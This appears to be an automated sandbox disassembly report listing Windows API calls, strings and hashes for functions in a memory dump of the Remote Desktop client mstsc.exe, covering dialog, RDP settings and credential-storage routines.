                                                                                                                                                                                        • Instruction ID: f4e0ec7d51941526a2a1dae7acb23f5e8ccaf15df464b4c7a99d13daa538c548
                                                                                                                                                                                        • Opcode Fuzzy Hash: 75120d7f8ea2968bf4e8e074f5f700a7e554de34f48e33832d8aa0791b3b79e1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5091CC71608349AFCB25DFA4D849FAB7BE9BF48304F000919F985D62A2D734C9849F57
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,0000331D,?,?), ref: 00906B3B
                                                                                                                                                                                        • GetDlgItemTextW.USER32(?,0000331E,?,00000104), ref: 00906B61
                                                                                                                                                                                        • GetDlgItemTextW.USER32(?,0000331F,?,00000104), ref: 00906B75
                                                                                                                                                                                          • Part of subcall function 00931C30: GetDlgItem.USER32(?,0093A070), ref: 00931C4E
                                                                                                                                                                                          • Part of subcall function 00931C30: EnableWindow.USER32(00000000), ref: 00931C55
                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000110,?,?), ref: 00906BAF
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000331E), ref: 00906BC4
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00906BCD
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000331F), ref: 00906BDB
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00906BDE
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003320), ref: 00906BEC
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00906BEF
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003321), ref: 00906BFD
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00906C00
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000110,?,00000110,00000000), ref: 00906C30
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,0000331E,-00006E98), ref: 00906C4A
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,0000331F,-000070A0), ref: 00906C5A
                                                                                                                                                                                        • CheckDlgButton.USER32(?,0000331D,00000000), ref: 00906C70
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000331D), ref: 00906C8B
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00906C92
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000331E), ref: 00906CC7
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00906CCE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Item$Window$Enable$Text$Button$Checked$Check
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1908904388-0
                                                                                                                                                                                        • Opcode ID: 6f9763b019aeacac6f047090e8ac0b4cc415c77d312c23fb8c7135daa7dca081
                                                                                                                                                                                        • Instruction ID: 0318e58f78d7271d4ac55009a2c790f018bcfd9409fa590389c1a5c8c6c03ebd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f9763b019aeacac6f047090e8ac0b4cc415c77d312c23fb8c7135daa7dca081
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251C5B1610118AFDB159F68CC88EBA77BDEF49700F0444A9F645EB2A1CB34AE50DF61
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000202,00000000,00000001,?,?,00000000,?), ref: 0091B2B8
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000404), ref: 0091B2CF
                                                                                                                                                                                        • CredUnPackAuthenticationBufferW.CREDUI(00000001,?,00000101,00000000,?,00000000,00000000,00000000,?), ref: 0091B301
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0091B30F
                                                                                                                                                                                        • CredUnPackAuthenticationBufferW.CREDUI(00000001,00000101,00000101,00000000,?,00000000,00000000,00000000,00000101), ref: 0091B3A1
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000001,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 0091B5E2
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000001,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 0091B5ED
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$AllocAuthenticationBufferCredFreePack$ErrorLast
                                                                                                                                                                                        • String ID: StringCchCopy failed!$StringCchLength failed!
                                                                                                                                                                                        • API String ID: 3028302246-3392236819
                                                                                                                                                                                        • Opcode ID: f77c2d21e91bf55cd5cbc3fb839d36ca556e409d1d70b6ae8c083276afe7ed5d
                                                                                                                                                                                        • Instruction ID: fed5d725ad3dde893ec11391a76c9e6081f87ee09ae43acd97f5f97de627a277
                                                                                                                                                                                        • Opcode Fuzzy Hash: f77c2d21e91bf55cd5cbc3fb839d36ca556e409d1d70b6ae8c083276afe7ed5d
                                                                                                                                                                                        • Instruction Fuzzy Hash: EFC17C71704309AFDB18CFA6C885BAA7BABFF49304F108459F911EB2A1DB74DD819B11
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 009287E5: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 009287F5
                                                                                                                                                                                          • Part of subcall function 009287E5: GetLastError.KERNEL32 ref: 00928800
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 009288BC
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 009288CC
                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00928909
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00928913
                                                                                                                                                                                        • memset.MSVCRT ref: 00928A1A
                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00928A31
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00928A3C
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00928A44
                                                                                                                                                                                        • IsTextUnicode.ADVAPI32(00000000,?,?), ref: 00928ADC
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000), ref: 00928B3C
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040), ref: 00928B46
                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000), ref: 00928BA0
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00928BA6
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 009289C9
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00928C29
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$ErrorFileFreeLast$AllocByteCharMultiReadWide$AddressHandleLibraryMessageModulePointerProcSizeTextTraceUnicodememset
                                                                                                                                                                                        • String ID: Failed to move pointer to the beginning of the file!
                                                                                                                                                                                        • API String ID: 3919189811-3433327527
                                                                                                                                                                                        • Opcode ID: 6a37660d0fc807176fe9dbc4c261c756f825decd5f2f3620cc40a266351155d1
                                                                                                                                                                                        • Instruction ID: 844cfbf1da39a83fdb11ea7be62b22a4a4d149045570376565987f8d4ae49d92
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a37660d0fc807176fe9dbc4c261c756f825decd5f2f3620cc40a266351155d1
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2C1F57151A361AFD725DF68AC48B2B7BA9FB45320F04051AF990E72A9CF34CC44DB92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 008E727F
                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 008E7288
                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 008E7291
                                                                                                                                                                                        • CreateMenu.USER32 ref: 008E7451
                                                                                                                                                                                        • InsertMenuW.USER32 ref: 008E74E1
                                                                                                                                                                                        • InsertMenuW.USER32 ref: 008E75F0
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 008E76BB
                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 008E76C4
                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 008E76CD
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • TSGTransportIsUsed, xrefs: 008E7543
                                                                                                                                                                                        • ServerSupportsEdgeActions, xrefs: 008E73DE
                                                                                                                                                                                        • Unable to get property (TS_PROP_CORE_CONNECTION_IS_RAIL), xrefs: 008E7358
                                                                                                                                                                                        • Unable to get property (TS_PROP_CORE_EDGE_ACTIONS_SUPPORTED), xrefs: 008E7414
                                                                                                                                                                                        • Unable to get property (TS_PROP_TRANSPORT_TSG_IS_USED), xrefs: 008E7579
                                                                                                                                                                                        • QueryInterface failed for IMsRdpExtendedSettings, xrefs: 008E72DF
                                                                                                                                                                                        • RailMode, xrefs: 008E732E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Variant$ClearInitMenu$Insert$AddressCreateFreeHandleLibraryModuleProc
                                                                                                                                                                                        • String ID: QueryInterface failed for IMsRdpExtendedSettings$RailMode$ServerSupportsEdgeActions$TSGTransportIsUsed$Unable to get property (TS_PROP_CORE_CONNECTION_IS_RAIL)$Unable to get property (TS_PROP_CORE_EDGE_ACTIONS_SUPPORTED)$Unable to get property (TS_PROP_TRANSPORT_TSG_IS_USED)
                                                                                                                                                                                        • API String ID: 847888681-1683191911
                                                                                                                                                                                        • Opcode ID: f24a887c12d412a45c58489848b26ff8f2955260c3bea40277f63cfaabff2987
                                                                                                                                                                                        • Instruction ID: 7348f3d81ca62223c4898703ac218ed0a7658efb0c1f1bfdd505066512045c8f
                                                                                                                                                                                        • Opcode Fuzzy Hash: f24a887c12d412a45c58489848b26ff8f2955260c3bea40277f63cfaabff2987
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AC1B271608384ABDB299F6ACC89F667BA9FB46304F140189F505EB2E2C774DD80DF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00904286
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00904293
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 009042A0
                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 009042A7
                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 009042B4
                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,00000000,00000000,?,00000000), ref: 009042F3
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0090431B
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 0090433E
                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00904364
                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 009043B9
                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00904413
                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0090446D
                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 009044C6
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: String$Free$Alloc$ErrorLast$AddressCurrentDirectoryHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: BSTR$CTscComHelper::StartRemoteApplication failed!$LoadConnectionSharingSettings failed
                                                                                                                                                                                        • API String ID: 2183484674-128383092
                                                                                                                                                                                        • Opcode ID: 098516445a5d0741831a44c55bcf6242cac8d243a33695068f442cfe7d176d0d
                                                                                                                                                                                        • Instruction ID: 7e54d09bb77ef0d2ffe496b0e082acf63dea9ce93b1123252928751a2213b5e6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 098516445a5d0741831a44c55bcf6242cac8d243a33695068f442cfe7d176d0d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 61B1B1B1A00358AFCB29CF69CC89B597BE9FB45314F14019AF704E72A2C674DD808F96
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000202,?,?,?,00000004), ref: 0092A1BC
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000404), ref: 0092A216
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0092A29B
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0092A2B8
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0092A2C9
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0092A32B
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000101), ref: 0092A33C
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • CredUnPackAuthenticationBufferW.CREDUI(00000000,?,?,00000000,?,00000000,00000000,00000000,00000101), ref: 0092A363
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000004,?,?,?,?,?,?), ref: 0092A54F
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000004,?,?,?,?,?,?), ref: 0092A55D
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000004,?,?,?,?,?,?), ref: 0092A568
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Local$Free$Alloc$MessageTrace$AddressAuthenticationBufferCredErrorHandleLastLibraryModulePackProc
                                                                                                                                                                                        • String ID: CreateSPN failed$PWSTR$StringCchLength failed$TERMSRV
                                                                                                                                                                                        • API String ID: 129126779-209314103
                                                                                                                                                                                        • Opcode ID: 0a77aedceb007526377811b413300f595a73778413ac9a7e920060fbc6043640
                                                                                                                                                                                        • Instruction ID: 98122abdd149e9e092889624175098738301c7e4f63d75419992b170de35b75c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a77aedceb007526377811b413300f595a73778413ac9a7e920060fbc6043640
                                                                                                                                                                                        • Instruction Fuzzy Hash: E6C1BE72A00365AFCB29DF98E849F6E7BA9FB09304F14405AF910EB2A5C674CD41DF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 009299F0
                                                                                                                                                                                        • CredGetSessionTypes.ADVAPI32(00000007,?), ref: 00929A7C
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00929AA4
                                                                                                                                                                                        • GetLastError.KERNEL32(008E396B,00000000,00000000,00000000), ref: 00929AC7
                                                                                                                                                                                        • CredWriteW.ADVAPI32(00000000,00000000,?,?,?,00000004,?,?,?,?,?), ref: 00929C52
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000004,?,?,?,?,?), ref: 00929C5C
                                                                                                                                                                                        • CredWriteW.ADVAPI32(00000000,00000000,?,?,00000004,?,?,?,?,?), ref: 00929C88
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000004,?,?,?,?,?), ref: 00929C96
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00929D95
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00929DA0
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00929DBA
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorFreeLast$CredLocal$MessageTraceWrite$AddressHandleLibraryModuleProcSessionTypesmemset
                                                                                                                                                                                        • String ID: CredWrite failed$PrepareForCredWriteNew failed$PrepareForCredWriteOld failed$TERMSRV
                                                                                                                                                                                        • API String ID: 1352401320-3796034688
                                                                                                                                                                                        • Opcode ID: 13467551c53b86001794a2b2f056b059272dd4b5ef1231acf1de6119160ebe16
                                                                                                                                                                                        • Instruction ID: a5828d647e47841078ea8ba51f724f994ff2d2b7a9be4686671e3d4e1ab48f6b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 13467551c53b86001794a2b2f056b059272dd4b5ef1231acf1de6119160ebe16
                                                                                                                                                                                        • Instruction Fuzzy Hash: A4C18E72900368AFDB29DF99E944F9E7BB9BB49310F140059F901EB2A6C634DC40DF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000), ref: 009048D3
                                                                                                                                                                                        • GetDlgItem.USER32(00000005,008D6780), ref: 00904913
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00904916
                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0090493B
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 0090493E
                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0090494D
                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00904950
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0090496F
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,000032FF), ref: 009049A0
                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 009049B6
                                                                                                                                                                                        • CreateDialogIndirectParamW.USER32(?,00000000,00000000,00931E40,?), ref: 009049FA
                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00904A09
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,000032FA), ref: 00904A1D
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00904A2E
                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00904A43
                                                                                                                                                                                        • GetDlgItem.USER32(00000000,000032FA), ref: 00904A51
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,00000141,000000FF,00000000), ref: 008F2B0E
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,00000144,00000000,00000000), ref: 008F2B22
                                                                                                                                                                                          • Part of subcall function 008F2AD9: wcsncmp.MSVCRT ref: 008F2B40
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 008F2B67
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 008F2BB9
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 008F2BC8
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,0000040E,00000000,00000001), ref: 008F2BD3
                                                                                                                                                                                          • Part of subcall function 008F2AD9: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 008F2BDD
                                                                                                                                                                                          • Part of subcall function 009047DA: GetDlgItem.USER32(?,000032FA), ref: 009047EA
                                                                                                                                                                                          • Part of subcall function 009047DA: SendMessageW.USER32(00000000,00000407,00000000,00000000), ref: 009047FA
                                                                                                                                                                                          • Part of subcall function 009047DA: #412.COMCTL32(00000000,Function_00034790,00000000), ref: 00904813
                                                                                                                                                                                          • Part of subcall function 009047DA: #410.COMCTL32(00000000,Function_00034790,00000000,00000000), ref: 00904858
                                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,000032FA,-00000054), ref: 00904A72
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ItemMessageSendWindow$Enable$Show$#410#412??2@CreateDialogIndirectParamRectTextwcsncmp
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1121832012-0
                                                                                                                                                                                        • Opcode ID: c60c1f1ec3d97bda2c43ea3ea3f02ca00e1713a1b8bf4a8fd034382e588b29bf
                                                                                                                                                                                        • Instruction ID: dfd30ed88c564c1be4553a8037797e6ee4e3d0d191e9c5820bc3dd92d8e03152
                                                                                                                                                                                        • Opcode Fuzzy Hash: c60c1f1ec3d97bda2c43ea3ea3f02ca00e1713a1b8bf4a8fd034382e588b29bf
                                                                                                                                                                                        • Instruction Fuzzy Hash: 71519EB1910214AFCF119FA5DC89AAB7BB9FF48701F018075F905AB2A5CB35A811DFA0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCommandLineW.KERNEL32(00000000,00000000,00915DAF,00000000,?,00000000,?,0091672F,00000000,00000000,?,00000001,?,00000000,00000000,0093AF68), ref: 008DFAA7
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 008DFB8A
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ??2@AddressCommandFreeHandleLibraryLineMessageModuleProcTrace
                                                                                                                                                                                        • String ID: CAtlExeModuleT::PreMessageLoop failed!$CTscRemoteSessionsManager$Embedding$Failed to to intialize remote sessions manager$RegServer$RegisterAppId failed!$RegisterServer failed!$SingleUse$UnregServer$UnregisterAppId failed!$UnregisterServer failed!$m_RemoteSessionLock.Init failed!
                                                                                                                                                                                        • API String ID: 2806423288-809283771
                                                                                                                                                                                        • Opcode ID: 9110157e98ddd4b500b6cf7b5f433b27a65d5b8571348d4e613170f80b7a8ffd
                                                                                                                                                                                        • Instruction ID: 184b5e88ad06a4d97d952c2910677a8706f219a4e9dde221be8942f88161ae93
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9110157e98ddd4b500b6cf7b5f433b27a65d5b8571348d4e613170f80b7a8ffd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 90A14B31A543556BCB299F69D859F293792FF05364F0902A7EA82DB3B3C664CC40BF42
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SetWindowTextW.USER32(?,?,?,?,?,00000000), ref: 00910251
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,0000335E,?,?,?,?,00000000), ref: 00910267
                                                                                                                                                                                        • GetDlgItem.USER32(?,0000335E), ref: 00910271
                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000CF,00000001,00000000), ref: 0091028B
                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00910296
                                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 009102A6
                                                                                                                                                                                        • GetDlgItem.USER32(?,00003366), ref: 009102D5
